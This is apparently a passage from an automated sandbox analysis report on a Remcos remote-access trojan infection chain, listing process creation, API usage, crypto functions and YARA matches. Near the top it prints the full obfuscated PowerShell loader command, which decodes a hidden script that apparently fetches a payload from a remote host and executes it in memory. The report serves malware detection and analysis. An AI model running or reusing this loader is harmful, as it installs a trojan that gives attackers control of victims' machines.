#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	8_2_00418267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	8_2_0041C077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	8_2_0041C0A3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	9_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004016FD NtdllDefWindowProc_A,	10_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004017B7 NtdllDefWindowProc_A,	10_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402CAC NtdllDefWindowProc_A,	11_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402D66 NtdllDefWindowProc_A,	11_2_00402D66

Contains functionality to shutdown / reboot the system

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

8_2_00416861

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03286580	5_2_03286580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03287960	5_2_03287960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0042809D	8_2_0042809D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0045412B	8_2_0045412B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004421C0	8_2_004421C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004281D7	8_2_004281D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043E1E0	8_2_0043E1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041E29B	8_2_0041E29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004373DA	8_2_004373DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00438380	8_2_00438380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00453472	8_2_00453472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0042747E	8_2_0042747E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043E43D	8_2_0043E43D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004325A1	8_2_004325A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043774C	8_2_0043774C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041F809	8_2_0041F809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004379F6	8_2_004379F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004279F5	8_2_004279F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044DAD9	8_2_0044DAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00433C73	8_2_00433C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00413CA0	8_2_00413CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00437CBD	8_2_00437CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043DD82	8_2_0043DD82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435F52	8_2_00435F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00437F78	8_2_00437F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0043DFB1	8_2_0043DFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10017194	8_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_1000B5C1	8_2_1000B5C1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A030	9_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040612B	9_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0043E13D	9_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044B188	9_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00442273	9_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D380	9_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044A5F0	9_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004125F6	9_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004065BF	9_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004086CB	9_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_004066BC	9_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044D760	9_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405A40	9_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00449A40	9_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405AB1	9_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405B22	9_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044ABC0	9_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00405BB3	9_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00417C60	9_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CC70	9_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00418CC9	9_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDFB	9_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044CDA0	9_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044AE20	9_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00415E3E	9_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00437F3B	9_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00405038	10_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041208C	10_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004050A9	10_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040511A	10_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043C13A	10_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004051AB	10_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449300	10_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0040D322	10_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A4F0	10_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043A5AB	10_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00413631	10_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00446690	10_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A730	10_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004398D8	10_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_004498E0	10_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044A886	10_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0043DA09	10_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00438D5E	10_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00449ED0	10_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0041FE83	10_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00430F54	10_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004050C2	11_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004014AB	11_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405133	11_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004051A4	11_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401246	11_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_0040CA46	11_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00405235	11_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004032C8	11_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00401689	11_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00402F60	11_2_00402F60

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401EBF appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00402117 appears 41 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2845
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2845			Jump to behavior

Yara signature match

Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winHTA@23/16@4/7

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

9_2_0041A225

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		8_2_00417AD9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		11_2_00410DE1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

9_2_0041A6AF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

8_2_0040C03C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_0041B9AB

